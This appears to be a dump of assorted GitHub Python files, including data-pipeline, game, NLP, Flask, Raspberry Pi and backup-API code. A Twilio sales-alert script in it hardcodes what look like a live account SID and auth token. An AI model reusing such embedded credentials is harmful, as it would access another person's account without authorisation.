{\"source\": {\"name\": \"DBA Name\"}, \"sink\": {\"name\": \"dba_name\"}},\n {\"source\": {\"name\": \"Street Address\"}, \"sink\": {\"name\": \"address\"}},\n {\"source\": {\"name\": \"City\"}, \"sink\": {\"name\": \"city\"}},\n {\"source\": {\"name\": \"State\"}, \"sink\": {\"name\": \"state\"}},\n {\"source\": {\"name\": \"Source Zipcode\"}, \"sink\": {\"name\": \"zipcode\"}},\n {\"source\": {\"name\": \"Business Start Date\"}, \"sink\": {\"name\": \"start_date\"}},\n {\"source\": {\"name\": \"Business End Date\"}, \"sink\": {\"name\": \"end_date\"}},\n {\"source\": {\"name\": \"Location Start Date\"}, \"sink\": {\"name\": \"loc_start_date\"}},\n {\"source\": {\"name\": \"Location End Date\"}, \"sink\": {\"name\": \"loc_end_date\"}},\n {\"source\": {\"name\": \"Mail Address\"}, \"sink\": {\"name\": \"mail_address\"}},\n ],\n )\n\n # wasbtosynapase_fire = WasbToSynapseOperator(\n # task_id='fire_data',\n # # Make sure to rename files\n # source_name= \"fire_data\",\n # destination_name=\"AzureSynapseAnalyticsTable2\",\n # resource_group_name=RESOURCE_GROUP,\n # # Need to create one factory per file?\n # factory_name=\"providersdf\",\n # # Activity ties to factory\n # activity_name=\"viraj_copy_fire_data\",\n # # This is a constant\n # translator_type=TRANSLATOR_TYPE,\n # mappings=[\n # {\"source\": {\"name\": \"Call Number\"}, \"sink\": {\"name\": \"call_number\"}},\n # {\"source\": {\"name\": \"Unit ID\"}, \"sink\": {\"name\": \"unit_id\"}},\n # {\"source\": {\"name\": \"Incident Number\"}, \"sink\": {\"name\": \"incidient_number\"}},\n # {\"source\": {\"name\": \"Call Type\"}, \"sink\": {\"name\": \"call_type\"}},\n # {\"source\": {\"name\": \"Call Date\"}, \"sink\": {\"name\": \"call_date\"}},\n # {\"source\": {\"name\": \"Watch Date\"}, \"sink\": {\"name\": \"watch_date\"}},\n # {\"source\": {\"name\": \"Received DtTm\"}, \"sink\": {\"name\": \"received_date\"}},\n # {\"source\": {\"name\": \"Entry DtTm\"}, \"sink\": {\"name\": \"entry_time\"}},\n # {\"source\": {\"name\": \"Dispatch DtTm\"}, \"sink\": {\"name\": \"dispatch\"}},\n # {\"source\": {\"name\": \"Response DtTm\"}, \"sink\": {\"name\": \"response_time\"}},\n # {\"source\": {\"name\": \"On Scene DtTm\"}, \"sink\": {\"name\": \"on_scene\"}},\n # {\"source\": {\"name\": \"Transport DtTm\"}, \"sink\": {\"name\": \"transport_time\"}},\n # {\"source\": {\"name\": \"Hospital DtTm\"}, \"sink\": {\"name\": \"hospital_time\"}},\n # {\"source\": {\"name\": \"Call Final Disposition\"}, \"sink\": {\"name\": \"final_dispatch\"}},\n # {\"source\": {\"name\": \"Available DtTm\"}, \"sink\": {\"name\": \"avaiable_time\"}},\n # {\"source\": {\"name\": \"Address\"}, \"sink\": {\"name\": \"address\"}},\n # {\"source\": {\"name\": \"City\"}, \"sink\": {\"name\": \"city\"}},\n # {\"source\": {\"name\": \"Zipcode of Incident\"}, \"sink\": {\"name\": \"zipcode\"}},\n # {\"source\": {\"name\": \"Battalion\"}, \"sink\": {\"name\": \"batallion\"}},\n # {\"source\": {\"name\": \"Station Area\"}, \"sink\": {\"name\": \"station_area\"}},\n # {\"source\": {\"name\": \"Box\"}, \"sink\": {\"name\": \"box\"}},\n # {\"source\": {\"name\": \"Original Priority\"}, \"sink\": {\"name\": \"origin_district\"}},\n # {\"source\": {\"name\": \"Priority\"}, \"sink\": {\"name\": \"priority\"}},\n # {\"source\": {\"name\": \"Final Priority\"}, \"sink\": {\"name\": \"final_priority\"}},\n # {\"source\": {\"name\": \"ALS Unit\"}, \"sink\": {\"name\": \"als_unit\"}},\n # {\"source\": {\"name\": \"Call Type Group\"}, \"sink\": {\"name\": \"call_type_group\"}},\n # {\"source\": {\"name\": \"Number of Alarms\"}, \"sink\": {\"name\": \"num_alarms\"}},\n # # {\"source\": {\"name\": \"Unit Type\"}, \"sink\": {\"name\": \"unit_type\"}},\n # {\"source\": {\"name\": \"Unit sequence in call dispatch\"}, \"sink\": {\"name\": \"unit_seq\"}},\n # {\"source\": {\"name\": \"Fire Prevention District\"}, \"sink\": {\"name\": \"fire_prevent_district\"}},\n # {\"source\": {\"name\": \"Supervisor District\"}, \"sink\": {\"name\": \"supervisor_district\"}},\n # {\"source\": {\"name\": \"Neighborhooods - Analysis Boundaries\"}, \"sink\": {\"name\": \"neighborhood\"}},\n # {\"source\": {\"name\": \"RowID\"}, \"sink\": {\"name\": \"rowid\"}},\n # {\"source\": {\"name\": \"case_location\"}, \"sink\": {\"name\": \"case_loc\"}}\n # # {\"source\": {\"name\": \"Analysis Neighborhoods\"}, \"sink\": {\"name\": \"analysis_neighborhoods\"}},\n\n # ],\n # )\n synapse_sql_query = SynapseSQLOperator(\n task_id=\"synapse_sql_query\",\n sql=\"SELECT zipcode, count(*) from [dbo].[sf_active_business_locations] GROUP BY zipcode\",\n )\n\n wasb_to_synapse","repo_name":"astronomer/azure_demo","sub_path":"dags/business_locations_transfer.py","file_name":"business_locations_transfer.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"41728985856","text":"import pygame\n\nclass objectq:\n def __init__(self,x,y,colour,speed_x,speed_y):\n self.x : float = x\n self.y : float = y\n self.r : float = 5\n self.colour = colour\n self.speed_x : float = speed_x\n self.speed_y : float = speed_y\n\n def draw(self, win):\n pygame.draw.circle(win,self.colour,(self.x,self.y),self.r)\n\n def hitWall(self):\n if self.x + self.r == 500.0:\n self.speed_x *= -1.0\n if self.x - self.r == 0.0:\n self.speed_x *= -1.0\n if self.y + self.r == 500.0:\n self.speed_y *= -1.0\n if self.y - self.r == 0.0:\n self.speed_y *= -1.0\n\n def movement(self):\n self.x -= self.speed_x\n self.y -= self.speed_y\n\ndef windraw():\n win.fill((255,255,255))\n Ball.draw(win)\n pygame.display.update()\n\nif __name__=='__main__':\n\n pygame.init()\n win = pygame.display.set_mode((500,500))\n pygame.display.set_caption(\"Игра для тестов\")\n win.fill((255,255,255))\n Ball = objectq(40.0,460.0,(255,0,50),0.5,0.5)\n\n run = True\n while run:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n Ball.hitWall()\n Ball.movement()\n windraw()\n\n pygame.quit()\n","repo_name":"aanazaretyan/project-1sem","sub_path":"SmallSillyProgram.py","file_name":"SmallSillyProgram.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"6837765110","text":"class Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n phone = {\n \"2\": list(\"abc\"),\n \"3\": list(\"def\"),\n \"4\": list(\"ghi\"),\n \"5\": list(\"jkl\"),\n \"6\": list(\"mno\"),\n \"7\": list(\"pqrs\"),\n \"8\": list(\"tuv\"),\n \"9\": list(\"wxyz\")\n }\n \n def comb(digits):\n \n if not digits:\n return []\n \n if len(digits) == 1:\n return [[digit] for digit in phone[digits]]\n \n res = []\n for com in comb(digits[1:]):\n for letter in phone[digits[0]]:\n res.append([letter] + com)\n \n return res\n \n \n return [\"\".join(l) for l in comb(digits)]\n","repo_name":"zelzhan/Challenges-and-contests","sub_path":"LeetCode/letter_combination_of_phone.py","file_name":"letter_combination_of_phone.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22702099377","text":"import pandas\nimport numpy\nimport sys\n\n# Fabian Charly Friedrich, April 2020\n# Convert CSV from Wochenende pipeline or Nextflow blast pipeline to XLSX using pandas\n# Use the runbatch_csv_to_xlsx.sh script\n# Or python3 csv_to_xlsx_converter.py \n\n\ndef read_annot(file):\n lines = open(file, 'r').readlines()\n data = []\n\n\n for line in lines:\t\n split_line = line.strip().split(' ')\n\n tmp = []\n for i in range(3):\n try:\n tmp.append(split_line[i])\n except IndexError:\n tmp.append(\"\")\n\n try:\n tmp.append(' '.join(split_line[3:]))\n except IndexError:\n tmp.append(\"\")\n\n data.append(tmp)\n\n return pandas.DataFrame(numpy.array(data))\n\ndef read_krakenuniq(file):\n lines = open(file, 'r').readlines()\n data = []\n for line in lines[3:]:\n tmp = []\n split_line = line.replace('\\n', '').split('\\t')\n\n for i in range(9):\n try:\n tmp.append(split_line[i])\n except IndexError:\n tmp.append('')\n\n data.append(tmp)\n\n return pandas.DataFrame(numpy.array(data[1:]), columns=data[0])\n\n\ndef main():\n file = sys.argv[1]\n\n if (\"annot\" in str(file)):\n # used for nextflow_blast output\n df = read_annot(file)\n # convert to Excel\n df.to_excel(file.replace('.csv', '.xlsx'), index=None, header=False)\n\n elif (\".rep.\" in str(file)):\n # used for Wochenende reporting output\n df = pandas.read_csv(file)\n # convert to Excel\n df.to_excel(file.replace('.csv', '.xlsx'), index=None, header=True)\n\n elif \"se.report.txt\" in str(file):\n # used for kraken2 output\n df = pandas.read_csv(file, sep='\\t', header=None)\n # convert to excel\n df.to_excel(file.replace('.txt', '.xlsx'), index=False, header=False)\n\n elif \"report.txt\" in str(file):\n # used for krakenuniq output\n df = read_krakenuniq(file)\n # convert to excel\n df.to_excel(file.replace('.txt', '.xlsx'), index=False, header=True)\n\n else:\n print(\"Could not detect CSV / text type\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MHH-RCUG/Wochenende","sub_path":"reporting/csv_to_xlsx_converter.py","file_name":"csv_to_xlsx_converter.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"21"} +{"seq_id":"30929453701","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Play sound listed in a file.\n\nPlay comamnd is given in arguments.\nExample:\nfor Linux\n fixedphrase.py --phrase_list=phrases.txt --command=\"aplay --quiet\"\nfor Macintosh\n fixedphrase.py --phrase_list=phrases.txt --command=\"afplay\"\n\"\"\"\n\n\nimport gflags\nimport subprocess\nimport threading\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_string(\"command\", \"aplay --quiet\", \"command to play wav.\")\ngflags.DEFINE_string(\"phrase_list\", None, \"list of path to wav files\")\n\n\nfiles = list() # path to wav files\n\n\ndef initialize():\n \"\"\"Set file path.\n\n Call me BEFORE using say.\n \"\"\"\n with open(FLAGS.phrase_list) as f:\n for line in f.read().split(\"\\n\"):\n if line:\n files.append(line)\n\n\ndef say(idx_phrase):\n \"\"\"Play sound using FLAGS.commad.\"\"\"\n path = files[idx_phrase]\n cmd = FLAGS.command + \" \" + path\n proc = subprocess.Popen(cmd, shell=True)\n\n def target():\n proc.wait()\n\n thread = threading.Thread(target=target)\n thread.start()\n\n\nif __name__ == '__main__':\n import sys\n import time\n argv = gflags.FLAGS(sys.argv)\n initialize()\n say(1)\n time.sleep(1)\n","repo_name":"caa-project/caa-central","sub_path":"GPIOController/fixedphrase.py","file_name":"fixedphrase.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35920829401","text":"from inspect import getmembers, getdoc, getsource, isclass, ismethod, signature, Signature\nfrom os import chdir\nfrom os.path import abspath, dirname\nfrom pathlib import Path\n\nfrom do.API import Do\nimport do.structures.Exceptions\n\n\ndef api_docstring_description(function_name):\n\n def parameter_signature(parameter_item):\n parameter_key, parameter_value = parameter_item\n return f\"#### {parameter_key}\\n```py\\n{parameter_value.annotation}\\n```\"\n\n name = str(function_name.__name__)\n function_signature = signature(function_name, follow_wrapped=True)\n\n title = f\"## Function Signature - Do.{name}\\n\"\n print(function_signature)\n # header = source.split(\"\\n\")[0][:-1].split(\" \", maxsplit=1)[1].strip(\" \")\n header = f\"### Header\\n\\n```py\\ndef {function_signature}\\n```\\n\"\n \n parameters = \"### Parameters\\n\\n\" + \"\\n\".join(map(parameter_signature, function_signature.parameters.items()))\n if len(function_signature.parameters) == 0:\n parameters = \"### Parameters\\n\\n**None**\\n\"\n \n if function_signature.return_annotation is not Signature.empty:\n return_annotation = function_signature.return_annotation\n else:\n return_annotation = \"None\"\n\n return_value = f\"### Return Value\\n\\n```py\\n{return_annotation}\\n```\\n\"\n \n sections = [title, header, parameters, return_value]\n \n return \"\\n\".join(sections) + \"\\n
    \\n\"\n\n\ndef exception_description(exception_name):\n return f\"## {exception_name}\\n\\n> {getdoc(exception_name)}\\n\\n\"\n\n\ndef populate_wiki_stubs():\n\n chdir(dirname(abspath(__file__)))\n\n api_signatures = {name: api_docstring_description(method) for (name, method) in\n getmembers(Do(model=None), predicate=ismethod)}\n\n exceptions = {name: exception_description(exception) for (name, exception) in\n getmembers(do.structures.Exceptions, predicate=isclass)}\n\n wiki_dir = Path(\"pages\")\n\n for file in wiki_dir.iterdir():\n if not file.is_file():\n continue\n\n text = file.read_text().splitlines()\n\n found = False\n for line, content in enumerate(text):\n if content.startswith(\"STUB\"):\n stub, replace = content.split(\"|\")\n if replace in api_signatures:\n text[line] = api_signatures[replace]\n elif replace == \"exceptions\":\n text[line] = \"\\n\\n\".join(exceptions.values())\n found = True\n\n if found:\n file.write_text(\"\\n\".join(text))\n\n\nif __name__ == \"__main__\":\n populate_wiki_stubs()\n","repo_name":"bradendubois/do-calculus","sub_path":"archive/build_wiki.py","file_name":"build_wiki.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"37216225801","text":"class Solution:\n def findPeakElement(self, nums: 'List[int]') -> int:\n s = 0\n e = len(nums)-1\n while s <= e: # binary search, use the larger number as the limit each time, until find the peak number\n mid = (s+e)//2\n left = nums[mid-1] if mid > 0 else -float('inf')\n right = nums[mid+1] if mid < len(nums)-1 else -float('inf')\n if nums[mid] > left and nums[mid] > right:\n return mid\n else:\n if left >= nums[mid]:\n e = mid - 1\n else:\n s = mid + 1\n return s\n\n\n#the O(N) approach\n# if len(nums) == 1:\n# return 0\n# for i in range (len(nums)):\n# if i ==0 and nums[i] > nums[i+1]:\n# return i\n# elif i == len(nums)-1 and nums[i] > nums[i-1]:\n# return i\n# elif nums[i]> nums[i-1] and nums[i] > nums[i+1]:\n# return i\n\n","repo_name":"renjieliu/leetcode","sub_path":"0001_0599/162.py","file_name":"162.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"45617781575","text":"import multiprocessing\nimport os\nimport re\nimport torch\nfrom torch.utils.data import Dataset\nfrom .token_utils import Vocab, tokenize, truncate_pad, get_tokens_and_segments\n\n\ndef read_snli(data_dir, is_train):\n \"\"\"将SNLI数据集解析为前提、假设和标签\"\"\"\n\n def extract_text(s):\n # 删除我们不会使⽤的信息\n s = re.sub('\\\\(', '', s)\n s = re.sub('\\\\)', '', s)\n # ⽤⼀个空格替换两个或多个连续的空格\n s = re.sub('\\\\s{2,}', ' ', s)\n return s.strip()\n\n label_set = {'entailment': 0, 'contradiction': 1, 'neutral': 2}\n file_name = os.path.join(data_dir, 'snli_1.0_train.txt' if is_train else 'snli_1.0_test.txt')\n with open(file_name, 'r') as f:\n rows = [row.split('\\t') for row in f.readlines()[1:]]\n premises = [extract_text(row[1]) for row in rows if row[0] in label_set]\n hypotheses = [extract_text(row[2]) for row in rows if row[0] in label_set]\n labels = [label_set[row[0]] for row in rows if row[0] in label_set]\n return premises, hypotheses, labels\n\n\nclass SNLIBERTDataset(torch.utils.data.Dataset):\n def __init__(self, dataset, max_len, vocab=None):\n all_premise_hypothesis_tokens = [[p_tokens, h_tokens] for p_tokens, h_tokens in zip(*[tokenize([s.lower() for s in sentences])for sentences in dataset[:2]])]\n self.labels = torch.tensor(dataset[2])\n self.vocab = vocab\n self.max_len = max_len\n (self.all_token_ids, self.all_segments, self.valid_lens) = self._preprocess(all_premise_hypothesis_tokens)\n print('read ' + str(len(self.all_token_ids)) + ' examples')\n\n def _preprocess(self, all_premise_hypothesis_tokens):\n pool = multiprocessing.Pool(4) # 使⽤4个进程\n out = pool.map(self._mp_worker, all_premise_hypothesis_tokens)\n all_token_ids = [token_ids for token_ids, segments, valid_len in out]\n all_segments = [segments for token_ids, segments, valid_len in out]\n valid_lens = [valid_len for token_ids, segments, valid_len in out]\n return (torch.tensor(all_token_ids, dtype=torch.long),\n torch.tensor(all_segments, dtype=torch.long),\n torch.tensor(valid_lens))\n\n def _mp_worker(self, premise_hypothesis_tokens):\n p_tokens, h_tokens = premise_hypothesis_tokens\n self._truncate_pair_of_tokens(p_tokens, h_tokens)\n tokens, segments = get_tokens_and_segments(p_tokens, h_tokens)\n token_ids = self.vocab[tokens] + [self.vocab['']] * (self.max_len - len(tokens))\n segments = segments + [0] * (self.max_len - len(segments))\n valid_len = len(tokens)\n return token_ids, segments, valid_len\n\n def _truncate_pair_of_tokens(self, p_tokens, h_tokens):\n # 为BERT输⼊中的''、''和''词元保留位置\n while len(p_tokens) + len(h_tokens) > self.max_len - 3:\n if len(p_tokens) > len(h_tokens):\n p_tokens.pop()\n else:\n h_tokens.pop()\n\n def __getitem__(self, idx):\n return (self.all_token_ids[idx], self.all_segments[idx], self.valid_lens[idx]), self.labels[idx]\n\n def __len__(self):\n return len(self.all_token_ids)\n","repo_name":"kaddly/NaturalLanguageProcessing","sub_path":"NaturalLanguageInference/BERT/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6293406126","text":"from flask import jsonify, request\nfrom app import app\nfrom app.restaurant_finder import find_restaurant\nfrom app.models import Restaurant, Base\nfrom create_db import engine\nfrom sqlalchemy.orm import sessionmaker\n\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n@app.route('/restaurants/', methods=['GET', 'POST'])\ndef all_restaurants():\n\n if request.method == 'GET':\n restaurants = session.query(Restaurant).all()\n return jsonify([item.serialize for item in restaurants])\n\n if request.method == 'POST':\n location = request.args.get('l')\n meal = request.args.get('m')\n restaurant_data = find_restaurant(meal, location)\n\n if restaurant_data['name'] == 'No restaurants found.':\n return jsonify({\"error\": \"No Restaurants Found for {} in {}\".format(meal, location)})\n else:\n rest_query = session.query(Restaurant).filter_by(name=restaurant_data['name'])\n if rest_query.first():\n restaurant = rest_query.first()\n return jsonify({\"error\": \"Restaurant {} already exists in the database.\".format(restaurant.name)})\n else:\n restaurant = Restaurant(name=restaurant_data['name'],\n address=restaurant_data['address'].decode('utf-8'),\n image=restaurant_data['image'])\n session.add(restaurant)\n session.commit()\n return jsonify(restaurant=restaurant.serialize)\n\n\n@app.route('/restaurants//', methods=['GET', 'PUT', 'DELETE'])\ndef restaurant(id):\n restaurant = session.query(Restaurant).filter_by(id=id).one()\n if request.method == 'GET':\n return jsonify(restaurant.serialize)\n\n if request.method == 'PUT':\n name = request.args.get('name')\n address = request.args.get('address')\n image = request.args.get('image')\n\n restaurant.update(name, address, image)\n session.commit()\n return jsonify({'Updated': restaurant.serialize})\n\n if request.method == 'DELETE':\n session.delete(restaurant)\n session.commit()\n return jsonify({'deleted': {'restaurant': restaurant.id}})\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"disfear86/Restaurant-Menus","sub_path":"api/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40985555937","text":"# Solução:\n\n# 1. Abrir os 6 arquivos do excel;\n# 2. Para cada arquivo, verificar se algum valor na coluna de vendas seja maior do que 55.000\n# 3. > 55.000 envia SMS com o Nome, Mês e as vendas do vendedor, se não for maior o programa para\n\n\n\nimport pandas as pd\nimport openpyxl as xls\nimport os\nfrom twilio.rest import Client\n\naccount_sid = 'AC13a05e5b30717f3a34700abf6e65568b'\nauth_token = '8a63bb0cfbc2648fa317f4eb8d2f0cdc'\n\nlista_meses = ['janeiro', 'fevereiro','março','abril','maio','junho']\n\nfor mes in lista_meses:\n print(mes)\n tabela_vendas = pd.read_excel(mes + '.xlsx')\n #print(tabela_vendas)\n\n if (tabela_vendas['Vendas'] > 55000).any():\n vendedor = tabela_vendas.loc[tabela_vendas['Vendas'] > 55000,'Vendedor'].values[0]\n vendas = tabela_vendas.loc[tabela_vendas['Vendas'] > 55000,'Vendas'].values[0]\n print(f'Encontrado mo mes de {mes} com mais de 55000. Vendedor:{vendedor} , Vendas{vendas}')\n else:\n print('Não encontrado')\n\n\n\n\nclient = Client(account_sid, auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"f'Encontrado mo mes de {mes} com mais de 55000. Vendedor:{vendedor} , Vendas{vendas}'\",\n from_='3204039070',\n to='5511973605501'\n )\n\nprint(message.sid)\n","repo_name":"fenunesmartins/Python_analise_de_comissao","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5438642487","text":"from typing import Union, List, Dict\nfrom src.insights.jobs import read\n\n\ndef get_max_salary(path: str) -> int:\n data = read(path)\n salaries_list = []\n max_salary = 0\n for row in data:\n if row[\"max_salary\"] and row[\"max_salary\"] != 'invalid':\n salaries_list.append(int(row[\"max_salary\"]))\n max_salary = max(salaries_list)\n return max_salary\n\n\ndef get_min_salary(path: str) -> int:\n data = read(path)\n salaries_list = []\n min_salary = 0\n for row in data:\n if row[\"min_salary\"] and row[\"min_salary\"] != 'invalid':\n salaries_list.append(int(row[\"min_salary\"]))\n min_salary = min(salaries_list)\n return min_salary\n\n\ndef matches_salary_range(job: Dict, salary: Union[int, str]) -> bool:\n try:\n if int(job[\"max_salary\"]) < int(job[\"min_salary\"]):\n raise ValueError('max_salary must be bigger than the min_salary')\n if int(job[\"min_salary\"]) <= int(salary) <= int(job[\"max_salary\"]):\n return True\n return False\n except (TypeError, KeyError) as error:\n raise ValueError(error)\n\n\ndef filter_by_salary_range(\n jobs: List[dict],\n salary: Union[str, int]\n) -> List[Dict]:\n filtered_by_salary = []\n for job in jobs:\n try:\n if matches_salary_range(job, salary):\n filtered_by_salary.append(job)\n except ValueError as error:\n print(error)\n return filtered_by_salary\n","repo_name":"heloisasantana/job-insights","sub_path":"src/insights/salaries.py","file_name":"salaries.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16841985576","text":"#!/usr/bin/python3\n'''\n takes in a URL, sends a request to the URL\n and displays the value of the X-Request-Id\n'''\nimport sys\nfrom urllib.request import Request, urlopen\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n req = Request(url)\n with urlopen(req) as response:\n headers = response.getheaders()\n\n for data in headers:\n if data[0] == \"X-Request-Id\":\n print(data[1])\n","repo_name":"andi-s0106/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12237770724","text":"from gpiozero import MotionSensor \nfrom picamera import PiCamera\nfrom datetime import datetime\nimport time\nimport os\n\npir = MotionSensor(4)\ncamera = PiCamera()\nflag = 1;\n\nwhile True:\n pir.wait_for_motion()\n print(\"Motion Detected\")\n today = datetime.now()\n fon = str('./' + today.strftime('%Y-%m-%d'))\n if today.hour == 0 and today.minute == 0 and today.second == 0:\n os.mkdir(fon)\n elif flag:\n os.mkdir(fon)\n flag = 0\n #dt = str(datetime.datetime.now())\n dt = time.strftime('%Y-%m-%d_%H:%M:%S')\n filename = fon + '/' + 'capture_' + dt + '.jpg'\n #camera.start_preview()\n camera.capture(filename)\n pir.wait_for_no_motion()\n continue\n #camera.close()\n #camera.stop_preview()\n","repo_name":"varada-raju/raspberrypi","sub_path":"pi_modules.py","file_name":"pi_modules.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34875675463","text":"from ..exception import SDKException\n\n\nclass TwoFactorAuthentication:\n \"\"\"Class for managing the security associations roles on the commcell\"\"\"\n\n def __init__(self, commcell_object, organization_id=None):\n \"\"\"\n Initializes TwoFactorAuthentication class object\n\n Args:\n commcell_object -- commcell class object.\n\n organization_id -- id of the organization on which two factor authentication\n operations to be performed.\n default:None\n\n Raises:\n SDKException:\n if invalid args are sent.\n \"\"\"\n self._commcell = commcell_object\n self._tfa_status = None\n self._tfa_enabled_user_groups = None\n self._org_id = None\n self._cvpysdk_object = commcell_object._cvpysdk_object\n self._services = commcell_object._services\n self._update_response_ = commcell_object._update_response_\n if organization_id:\n if isinstance(organization_id, (int, str)):\n self._org_id = organization_id\n else:\n raise SDKException('Security', '101')\n self.refresh()\n\n def refresh(self):\n \"\"\"\n Refresh the properties of two factor authentication\n\n Returns:\n None\n \"\"\"\n self._get_tfa_info()\n\n def _get_tfa_info(self):\n \"\"\"\n Executes api on the server and fetches commcell/organization two factor authentication info.\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to fetch details\n if response is emmpty\n if response is not success\n \"\"\"\n url = self._services['TFA']\n\n if self._org_id:\n url = self._services['ORG_TFA'] % self._org_id\n\n flag, response = self._cvpysdk_object.make_request(\n 'GET', url\n )\n\n if flag:\n if response.json() and 'twoFactorAuthenticationInfo' in response.json():\n info = response.json().get('twoFactorAuthenticationInfo')\n\n if 'error' in response.json() and 'errorCode' in response.json().get('error'):\n if response.json().get('error').get('errorCode') != 0:\n error_msg = response.json().get('error').get('errorCode').get('errorString')\n raise SDKException('Security',\n '102',\n 'Failed to get the tfa info. \\nError {0}'.format(error_msg))\n\n if 'mode' in info:\n if info.get('mode') == 0:\n self._tfa_status, self._tfa_enabled_user_groups = False, []\n if info.get('mode') in (1, 2):\n self._tfa_status, self._tfa_enabled_user_groups = True, info.get('userGroups', [])\n else:\n raise SDKException('Response', '102')\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _process_response(self, flag, response):\n \"\"\"\n Processes the flag and response json\n\n Args:\n\n flag (int) -- status of api execution\n\n response (byte) -- data received from server\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to get required info\n \"\"\"\n if flag:\n if response.json():\n response_json = {}\n if 'response' in response.json():\n response_json = response.json()['response'][0]\n if 'error' in response.json():\n response_json = response.json().get('error')\n if response_json.get('errorCode') != 0:\n error_msg = response_json.get('errorString')\n raise SDKException('Security',\n '102',\n 'Failed to get the two factor authentication info.'\n ' \\nError {0}'.format(error_msg))\n self.refresh()\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def disable_tfa(self):\n \"\"\"\n Disables two factor authentication at commcell/organization level\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to disable tfa.\n \"\"\"\n url = self._services['TFA_DISABLE']\n if self._org_id:\n url = self._services['ORG_TFA_DISABLE'] % self._org_id\n flag, response = self._cvpysdk_object.make_request(\n 'PUT', url\n )\n self._process_response(flag=flag, response=response)\n\n def enable_tfa(self, user_groups=None):\n \"\"\"\n Enables two factor authentication at commcell/organization level.\n\n Args:\n user_groups (list) -- user group names on which two factor authentication needs to be enabled\n\n Returns:\n None\n\n Raises:\n SDKException:\n if failed to enable tfa.\n \"\"\"\n url = self._services['TFA_ENABLE']\n\n if self._org_id:\n url = self._services['ORG_TFA_ENABLE'] % self._org_id\n\n user_groups_list = []\n if user_groups:\n if isinstance(user_groups, list):\n for group in user_groups:\n group_obj = self._commcell.user_groups.get(user_group_name=group)\n user_groups_list.append({\"userGroupName\": group_obj.name})\n else:\n raise SDKException('Security', '101')\n\n payload = {\n \"twoFactorAuthenticationInfo\": {\n \"mode\": 2 if user_groups_list else 1,\n \"userGroups\": user_groups_list\n }\n }\n\n if not self._org_id:\n payload = {\n \"commCellInfo\": {\n \"generalInfo\": payload\n }\n }\n\n flag, response = self._cvpysdk_object.make_request(\n 'PUT', url, payload\n )\n self._process_response(flag=flag, response=response)\n\n @property\n def is_tfa_enabled(self):\n \"\"\"Returns status of two factor authentication(True/False)\"\"\"\n return self._tfa_status\n\n @property\n def tfa_enabled_user_groups(self):\n \"\"\"\n Returns list of user group names for which two factor authentication is enabled\n eg:-\n [\n {\n \"userGroupId\": 1,\n \"userGroupName\": \"dummy\"\n }\n ]\n \"\"\"\n return self._tfa_enabled_user_groups\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/security/two_factor_authentication.py","file_name":"two_factor_authentication.py","file_ext":"py","file_size_in_byte":7032,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"18742540338","text":"#!/usr/bin/env python3\n\nimport numpy as np\n\n\ndef linearKernel(x1, x2):\n #LINEARKERNEL returns a linear kernel between x1 and x2\n # sim = linearKernel(x1, x2) returns a linear kernel between x1 and x2\n # and returns the value in sim\n\n # Ensure that x1 and x2 are column vectors\n x1 = x1.ravel()\n x2 = x2.ravel()\n\n # Compute the kernel\n sim = np.dot(x1, x2)\n\n return sim\n #end","repo_name":"altermarkive/machine-learning-course-by-stanford-university","sub_path":"machine-learning-ex6/ex6/linearKernel.py","file_name":"linearKernel.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} 